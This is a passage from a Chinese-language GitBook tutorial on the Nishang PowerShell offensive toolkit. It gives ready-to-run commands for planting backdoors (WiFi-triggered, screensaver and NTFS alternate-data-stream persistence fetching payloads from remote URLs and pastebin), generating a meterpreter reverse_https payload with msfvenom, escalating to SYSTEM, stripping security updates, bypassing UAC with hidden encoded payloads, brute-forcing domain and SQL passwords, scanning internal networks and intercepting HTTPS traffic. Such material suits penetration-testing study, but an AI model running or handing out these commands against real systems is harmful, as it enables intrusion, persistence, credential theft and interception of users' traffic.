<li>&#x5982;&#x679C;&#x5B83;&#x7684;&#x7B2C;&#x4E94;&#x4E2A;&#x5B57;&#x7B26;&#x662F;u&#x7684;&#x8BDD;&#x5C31;&#x4EE3;&#x8868;&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x3002;
&#x4F8B;&#x5982;&#xFF1A;-MagicString testuXXXX
&#x5C31;&#x4F1A;&#x5339;&#x914D;WIFI SSID&#x4E3A;test&#x7684;&#xFF0C;&#x5E76;&#x9ED8;&#x8BA4;&#x4E0B;&#x8F7D;<a href="http://goo.gl/XXXX" target="_blank">http://goo.gl/XXXX</a>
（其中 http://goo.gl 这个前缀可在脚本的$PayloadURL参数中修改；注意 goo.gl 短链接服务已经停用，实际使用时应改为自己控制的地址）</li>
<li>&#x8FD8;&#x53EF;&#x4EE5;&#x7528;Arguments&#x53C2;&#x6570;&#x6765;&#x6307;&#x5B9A;&#x4E0B;&#x8F7D;&#x811A;&#x672C;
&#x4F8B;&#x5982;&#xFF1A;
PS &gt;Gupt-Backdoor -MagicString test -Argument Get-Information -Verbose 
&#x5C31;&#x53EF;&#x4EE5;&#x4E0B;&#x8F7D;Get-Information&#x7684;&#x811A;&#x672C;&#x4E86;</li>
</ul>
<p>&#x8865;&#x5145;
Windows&#x4E0B;&#x521B;&#x5EFA;&#x4E00;&#x4E2A;WIFI&#xFF1A;</p>
<pre><code class="lang-powershell">cmd
netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=test key=<span class="hljs-number">1234567890</span>
netsh wlan start hostednetwork
</code></pre>
<h4 id="add-scrnsavebackdoor">Add-ScrnSaveBackdoor</h4>
<p>这个脚本可以帮助我们利用Windows的屏保来留下一个隐藏的后门。后门只有在屏保真正被触发时才会运行，并且以当前登录用户的权限执行，因此触发时机取决于该用户的空闲超时/屏保设置；如果目标禁用了屏保，这个后门就不会生效。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt;Add-ScrnSaveBackdoor -Payload <span class="hljs-string">&quot;powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process&quot;</span> //&#x4F7F;&#x7528;&#x8FD9;&#x6761;&#x8BED;&#x53E5;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x6211;&#x4EEC;&#x81EA;&#x5DF1;&#x7684;Payload
PS &gt;Add-ScrnSaveBackdoor -PayloadURL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.1</span>/Powerpreter.psm1 -Arguments HTTP-Backdoor 
http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis //&#x5229;&#x7528;&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x53EF;&#x4EE5;&#x4ECE;powershell&#x6267;&#x884C;&#x4E00;&#x4E2A;HTTP-Backdoor
PS &gt;Add-ScrnSaveBackdoor -PayloadURL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.1</span>/code_exec.ps1  //&#x8FD8;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;msfvenom&#x5148;&#x751F;&#x6210;&#x4E00;&#x4E2A;powershell (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<span class="hljs-number">192.168</span>.<span class="hljs-number">254.226</span> -f powershell)&#xFF0C;&#x7136;&#x540E;&#x5229;&#x7528;&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x8FD4;&#x56DE;&#x4E00;&#x4E2A;meterpreter
</code></pre>
<p>&#x5176;&#x4ED6;&#x5177;&#x4F53;&#x7684;&#x53C2;&#x6570;&#x7684;&#x610F;&#x601D;&#x548C;&#x6211;&#x4EEC;&#x4E0A;&#x9762;&#x4ECB;&#x7ECD;&#x7684;&#x4E00;&#x4E9B;&#x540E;&#x95E8;&#x662F;&#x7C7B;&#x4F3C;&#x7684;</p>
<ul>
<li>PayloadURL &#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x4E0B;&#x8F7D;&#x7684;&#x811A;&#x672C;&#x5730;&#x5740;</li>
<li>Arguments   指定我们要执行的函数以及相关参数</li>
</ul>
<h4 id="invoke-adsbackdoor">Invoke-ADSBackdoor</h4>
<p>这个脚本是使用NTFS数据流留下一个永久性后门。其实，由NTFS数据流带来的一些安全问题的利用并不少见了（如：利用NTFS数据流在Mysql UDF提权中创建lib/plugin目录），大家可以参考《<a href="http://wenku.baidu.com/view/22e049f55022aaea998f0f7c.html?from=search" target="_blank">NTFS ADS带来的WEB安全问题</a>》
这个脚本可以向ADS中注入代码并且以普通用户权限运行
执行方式：</p>
<pre><code class="lang-powershell">PS &gt;Invoke-ADSBackdoor -PayloadURL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.1</span>/Powerpreter.psm1 -Arguments HTTP-Backdoor <span class="hljs-string">&quot;http://pastebin.
com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
</span></code></pre>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x4E3B;&#x8981;&#x6709;&#x4E24;&#x4E2A;&#x53C2;&#x6570;&#xFF0C;&#x5728;&#x4E0A;&#x9762;&#x4ECB;&#x7ECD;&#x5176;&#x4ED6;&#x540E;&#x95E8;&#x5F53;&#x4E2D;&#x5DF2;&#x7ECF;&#x8BF4;&#x660E;&#x4E86;&#xFF0C;&#x8FD9;&#x91CC;&#x662F;&#x7C7B;&#x4F3C;&#x7684;
&#x9700;&#x8981;&#x8BF4;&#x660E;&#x7684;&#x662F;&#xFF0C;&#x6267;&#x884C;&#x540E;&#x5B83;&#x4F1A;&#x5728;AppData&#x7684;&#x76EE;&#x5F55;&#x4E0B;&#x5EFA;&#x7ACB;&#x4E00;&#x4E2A;ads&#x5E76;&#x628A;&#x6211;&#x4EEC;&#x7684;Payload&#x6CE8;&#x5165;&#x8FDB;&#x53BB;&#xFF0C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x5E0C;&#x671B;&#x5728;cmd&#x4E0B;&#x770B;&#x5230;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x5EFA;&#x7ACB;&#x7684;ads&#xFF0C;&#x9700;&#x8981;&#x4F7F;&#x7528;&#xFF1A;dir /a /r</p>
<h3 id="4&#x5BA2;&#x6237;&#x7AEF;">4.&#x5BA2;&#x6237;&#x7AEF;</h3>
<p>&#x5BF9;&#x4E8E;&#x8FD9;&#x4E00;&#x90E8;&#x5206;&#x7684;&#x811A;&#x672C;&#xFF0C;&#x6211;&#x5C31;&#x4E0D;&#x518D;&#x8D58;&#x8FF0;&#x4E86;&#xFF0C;&#x56E0;&#x4E3A;&#x7F51;&#x4E0A;&#x65E9;&#x5DF2;&#x7ECF;&#x6709;&#x4E86;&#x5BF9;&#x4E8E;&#x8FD9;&#x4E00;&#x90E8;&#x5206;&#x811A;&#x672C;&#x7684;&#x4ECB;&#x7ECD;&#x8BF4;&#x660E;&#xFF1A;
[&#x4F7F;&#x7528;Powershell Client&#x8FDB;&#x884C;&#x6709;&#x6548;&#x9493;&#x9C7C;][8]</p>
<h3 id="5&#x6743;&#x9650;&#x63D0;&#x5347;">5.&#x6743;&#x9650;&#x63D0;&#x5347;</h3>
<h4 id="enable-duplicatetoken">Enable-DuplicateToken</h4>
<p>这个脚本可以帮助我们在已经获得了一定权限的情况下，使我们提升到System权限。这里的"一定权限"指的是已经处于管理员（高完整性）级别的PowerShell会话：脚本通过复制（Duplicate）一个SYSTEM进程的令牌来切换到SYSTEM，它不是提权漏洞利用，不能从普通用户直接到达SYSTEM。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt; Enable-DuplicateToken
</code></pre>
<p>&#x5177;&#x4F53;&#x7684;&#x76F8;&#x5173;&#x4ECB;&#x7ECD;&#x53EF;&#x4EE5;&#x67E5;&#x9605;&#xFF1A;
<a href="https://blogs.technet.microsoft.com/heyscriptingguy/2012/07/05/use-powershell-to-duplicate-process-tokens-via-pinvoke/" target="_blank">https://blogs.technet.microsoft.com/heyscriptingguy/2012/07/05/use-powershell-to-duplicate-process-tokens-via-pinvoke/</a></p>
<h4 id="remove-update">Remove-Update</h4>
<p>这个脚本可以帮助我们移除系统所有的更新，或所有安全更新，以及指定编号的更新。
注意：卸载补丁是破坏性操作，会把已修复的漏洞重新带回目标系统，通常需要管理员权限并伴随重启，而且非常显眼（系统日志和更新历史都会留下记录）。在真实的渗透测试中，除非授权范围明确允许，否则不应该在客户系统上这样做，建议只在实验环境中使用。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt; Remove-Update All       //&#x79FB;&#x9664;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x7684;&#x6240;&#x6709;&#x66F4;&#x65B0;
PS &gt; Remove-Update Security  //&#x79FB;&#x9664;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x6240;&#x6709;&#x5B89;&#x5168;&#x76F8;&#x5173;&#x66F4;&#x65B0;
PS &gt; Remove-Update KB2761226 //&#x79FB;&#x9664;&#x6307;&#x5B9A;&#x7F16;&#x53F7;&#x7684;&#x66F4;&#x65B0;
</code></pre>
<h4 id="invoke-psuacme">Invoke-PsUACme</h4>
<p>Invoke-PsUACme&#x4F7F;&#x7528;&#x4E86;&#x6765;&#x81EA;&#x4E8E;UACME&#x9879;&#x76EE;&#x7684;DLL&#x6765;Bypass UAC&#x3002;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/uac.jpg" alt="Bypass UAC">
&#x4E0A;&#x8868;&#x7ED9;&#x51FA;&#x4E86;&#x5404;&#x79CD;UAC&#x7ED5;&#x8FC7;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5728;Invoke-PsUACme&#x4E2D;&#x6307;&#x5B9A;&#x76F8;&#x5E94;&#x65B9;&#x6CD5;&#x6267;&#x884C;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Invoke-PsUACme -Verbose //&#x4F7F;&#x7528;Sysprep&#x65B9;&#x6CD5;&#x548C;&#x9ED8;&#x8BA4;&#x7684;Payload&#x6267;&#x884C;
PS &gt; Invoke-PsUACme -method oobe -Verbose //&#x4F7F;&#x7528;oobe&#x65B9;&#x6CD5;&#x548C;&#x9ED8;&#x8BA4;&#x7684;Payload&#x6267;&#x884C;
PS &gt; Invoke-PsUACme -method oobe -Payload <span class="hljs-string">&quot;powershell -windowstyle hidden -e YourEncodedPayload&quot;</span> //&#x4F7F;&#x7528;-Payload&#x53C2;&#x6570;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x6307;&#x5B9A;&#x8981;&#x6267;&#x884C;&#x7684;Payload
</code></pre>
<p>除此以外，我们还可以使用-PayloadPath参数来指定Payload的路径，默认情况下Payload会被写入C:\Windows\Temp\cmd.bat并从那里执行（这个文件会留在磁盘上，用完需要清理）。还可以使用-CustomDLL64（64位）或-CustomDLL32（32位）参数来自定义一个DLL文件。需要注意的是，这些方法依赖特定Windows版本上自动提权程序的DLL劫持，较新的系统版本已经修复了其中不少，而且前提是当前用户本身就在本地管理员组且UAC处于默认级别，使用前应先在目标对应的版本上验证。</p>
<h3 id="6&#x626B;&#x63CF;">6.&#x626B;&#x63CF;</h3>
<h4 id="invoke-bruteforce">Invoke-BruteForce</h4>
<p>这个脚本可以对SQL Server、域控制器、Web以及FTP进行口令的爆破。
注意：对域账号（-Service ActiveDirectory）按"用户名列表 × 密码字典"逐个尝试，很容易触发域的账户锁定策略，把真实用户锁在门外并立刻暴露自己；实际操作前应先查询锁定阈值和观察窗口，改为每轮只试一两个常见密码的密码喷洒方式，并且要清楚所有失败登录都会记录在域控的安全日志中。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt; Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose //&#x7206;&#x7834;&#x57DF;&#x63A7;&#x5236;&#x5668;
PS &gt; Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose  //&#x7206;&#x7834;SQL Server
PS &gt; cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose  //&#x7206;&#x7834;server.txt&#x4E2D;&#x6240;&#x6709;servers&#x7684;SQL Server
</code></pre>
<p>&#x4E3B;&#x8981;&#x7684;&#x53C2;&#x6570;&#xFF1A;</p>
<ul>
<li>ComputerName &#x7528;&#x4E8E;&#x6307;&#x5B9A;&#x5BF9;&#x5E94;&#x670D;&#x52A1;&#x7684;&#x8BA1;&#x7B97;&#x673A;&#x540D;</li>
<li>UserList &#x7528;&#x6237;&#x540D;&#x5B57;&#x5178;</li>
<li>PasswordList &#x5BC6;&#x7801;&#x5B57;&#x5178;</li>
<li>Service &#x670D;&#x52A1;&#x7C7B;&#x578B;&#xFF08;&#x6CE8;&#x610F;&#x9ED8;&#x8BA4;&#x4E3A;&#xFF1A;SQL&#xFF09;</li>
<li>StopOnSuccess 成功找到一个后就停止执行</li>
</ul>
<h4 id="invoke-portscan">Invoke-PortScan</h4>
<p>利用这个脚本我们可以在目标机器上对内网进行端口扫描
执行方式：</p>
<pre><code class="lang-powershell">PS &gt;Invoke-PortScan -StartAddress <span class="hljs-number">192.168</span>.<span class="hljs-number">0.1</span> -EndAddress <span class="hljs-number">192.168</span>.<span class="hljs-number">10.254</span> -ResolveHost -ScanPort -Port <span class="hljs-number">80</span>
</code></pre>
<p>&#x4E3B;&#x8981;&#x7684;&#x53C2;&#x6570;&#xFF1A;</p>
<ul>
<li>StartAddress &#x626B;&#x63CF;&#x8303;&#x56F4;&#x5F00;&#x59CB;&#x7684;&#x5730;&#x5740;</li>
<li>EndAddress   &#x626B;&#x63CF;&#x8303;&#x56F4;&#x7ED3;&#x675F;&#x7684;&#x5730;&#x5740;</li>
<li>ScanPort &#x8FDB;&#x884C;&#x7AEF;&#x53E3;&#x626B;&#x63CF;</li>
<li>Port &#x6307;&#x5B9A;&#x626B;&#x63CF;&#x7AEF;&#x53E3;&#xFF08;&#x9ED8;&#x8BA4;&#x626B;&#x63CF;&#x7AEF;&#x53E3;&#xFF1A;21,22,23,53,69,71,80,98,110,139,111,
389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901&#xFF09;</li>
<li>TimeOut  &#x8BBE;&#x7F6E;&#x8D85;&#x65F6;&#x65F6;&#x95F4;</li>
</ul>
<h3 id="7&#x4E2D;&#x95F4;&#x4EBA;">7.&#x4E2D;&#x95F4;&#x4EBA;</h3>
<h4 id="invoke-interceptor">Invoke-Interceptor</h4>
<p>这个脚本可以通过建立一个代理服务器的方式来拦截HTTPS的请求，并将这些请求记录下来。它本质上是一个中间人代理：目标上的浏览器或系统代理需要指向它的监听端口（默认8081），而且由于它用自己的证书终止TLS，客户端访问HTTPS站点时通常会看到证书告警，除非额外把该证书导入了信任存储；拦截到的请求会被明文写入目标TEMP目录下的日志文件，用完同样需要清理。
执行方式：</p>
<pre><code class="lang-powershell">PS &gt;Invoke-Interceptor -ProxyServer <span class="hljs-number">192.168</span>.<span class="hljs-number">230.21</span> -ProxyPort <span class="hljs-number">3128</span> //&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x5C06;&#x9ED8;&#x8BA4;&#x5728;<span class="hljs-number">8081</span>&#x7AEF;&#x53E3;&#x76D1;&#x542C;&#x5E76;&#x628A;&#x8BF7;&#x6C42;&#x53D1;&#x9001;&#x7ED9;&#x4E0A;&#x6E38;&#x4EE3;&#x7406;&#x7684;<span class="hljs-number">3128</span>&#x7AEF;&#x53E3;
</code></pre>
<p>&#x53EF;&#x4EE5;&#x901A;&#x8FC7;ListenPort&#x6765;&#x4FEE;&#x6539;&#x6211;&#x4EEC;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x7684;&#x76D1;&#x542C;&#x7AEF;&#x53E3;&#xFF08;&#x9ED8;&#x8BA4;8081&#x7AEF;&#x53E3;&#xFF09;
&#x4F8B;&#x5982;
&#x6211;&#x4EEC;&#x5728;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x6267;&#x884C;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/interceptor.jpg" alt="interceptor">
&#x7136;&#x540E;&#x8FD9;&#x91CC;&#x672C;&#x673A;&#x6211;&#x7528;NC&#x6765;&#x76D1;&#x542C;&#x5BF9;&#x5E94;&#x7AEF;&#x53E3;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/interceptor2.jpg" alt="interceptor">
&#x63A5;&#x6536;&#x5230;&#x4E86;&#x6765;&#x81EA;&#x76EE;&#x6807;&#x673A;&#x7684;&#x8BF7;&#x6C42;&#x6570;&#x636E;
&#x5E76;&#x4E14;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x4F1A;&#x5728;&#x76EE;&#x6807;&#x673A;&#x7684;TEMP&#x76EE;&#x5F55;&#x4E0B;&#x751F;&#x6210;interceptor.log&#x7684;&#x6587;&#x4EF6;&#x6765;&#x8BB0;&#x5F55;&#x8BF7;&#x6C42;&#x6570;&#x636E;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/interceptorlog.jpg" alt="interceptorlog"></p>
<h3 id="nishang&#x7ED3;&#x8BED;">Nishang&#x7ED3;&#x8BED;</h3>
<p>Nishang&#x8FD9;&#x6B3E;&#x57FA;&#x4E8E;PowerShell&#x7684;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x4E13;&#x7528;&#x5DE5;&#x5177;&#x96C6;&#x6210;&#x4E86;&#x975E;&#x5E38;&#x591A;&#x5B9E;&#x7528;&#x7684;&#x811A;&#x672C;&#x4E0E;&#x6846;&#x67B6;&#xFF0C;&#x65B9;&#x4FBF;&#x6211;&#x4EEC;&#x5728;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x8FC7;&#x7A0B;&#x4E4B;&#x4E2D;&#x4F7F;&#x7528;&#x3002;&#x5C3D;&#x7BA1;&#xFF0C;&#x5728;&#x4E00;&#x4E9B;&#x73AF;&#x5883;&#x4E0B;&#x6211;&#x4EEC;&#x53EF;&#x80FD;&#x6CA1;&#x6709;&#x529E;&#x6CD5;&#x53BB;&#x6267;&#x884C;Powershell&#xFF0C;&#x4F46;&#x662F;&#x901A;&#x8FC7;&#x67E5;&#x770B;&#x8FD9;&#x4E9B;&#x811A;&#x672C;&#x7684;&#x5177;&#x4F53;&#x4EE3;&#x7801;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x53EF;&#x4EE5;&#x81EA;&#x5DF1;&#x53BB;&#x5B8C;&#x6210;&#x5B9E;&#x73B0;&#x811A;&#x672C;&#x63D0;&#x4F9B;&#x7684;&#x4E00;&#x4E9B;&#x529F;&#x80FD;&#x3002;&#x9650;&#x4E8E;&#x7BC7;&#x5E45;&#xFF0C;&#x672C;&#x6587;&#x53EA;&#x80FD;&#x629B;&#x7816;&#x5F15;&#x7389;&#x5730;&#x4ECB;&#x7ECD;Nishang&#x7684;&#x90E8;&#x5206;&#x529F;&#x80FD;&#xFF0C;&#x5E0C;&#x671B;&#x5927;&#x5BB6;&#x80FD;&#x591F;&#x5728;&#x5B9E;&#x9645;&#x7684;&#x5E94;&#x7528;&#x4E4B;&#x4E2D;&#x53BB;&#x4F53;&#x9A8C;&#x3002;</p>
<h2 id="&#x603B;&#x7ED3;">&#x603B;&#x7ED3;</h2>
<p>&#x597D;&#x4E86;&#xFF0C;&#x76EE;&#x524D;&#x5173;&#x4E8E;Powershell&#x7684;&#x4E1C;&#x897F;&#x5DF2;&#x7ECF;&#x5206;&#x4EAB;&#x5B8C;&#x5566;&#xFF0C;&#x4E2D;&#x95F4;&#x4E00;&#x4E9B;&#x5185;&#x5BB9;&#x6216;&#x8BB8;&#x6709;&#x4E9B;&#x9519;&#x8BEF;&#xFF0C;&#x4E4B;&#x540E;&#x5982;&#x679C;&#x8FD8;&#x6709;&#x66F4;&#x65B0;&#x8BF7;&#x5173;&#x6CE8;&#x6211;&#x7684;<a href="https://rootclay.gitbooks.io/powershell-attack-guide/content/" target="_blank">GitBook</a>&#xFF0C;&#x6700;&#x540E;&#x5148;&#x5356;&#x4E00;&#x6CE2;&#x7EA2;&#x7EBF;&#xFF5E;&#xFF0C;&#x5927;&#x5BB6;&#x4E0D;&#x77E5;&#x9053;&#x7EA2;&#x7EBF;&#x662F;&#x4EC0;&#x4E48;&#x7684;&#x8BDD;&#x53EF;&#x4EE5;&#x626B;&#x4E00;&#x626B;:)</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/7.jpg" alt=""></p>

                                
                                </section>
                            
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"Framework","level":"1.4.2","depth":2,"previous":{"title":"实例使用场景","level":"1.4.1","depth":2,"path":"12. 实例使用场景.md","ref":"12. 实例使用场景.md","articles":[]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"13. Framework.md","mtime":"2020-04-13T09:55:17.642Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-04-13T09:56:21.455Z"},"basePath":".","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="gitbook/gitbook.js"></script>
    <script src="gitbook/theme.js"></script>
    
        
        <script src="gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

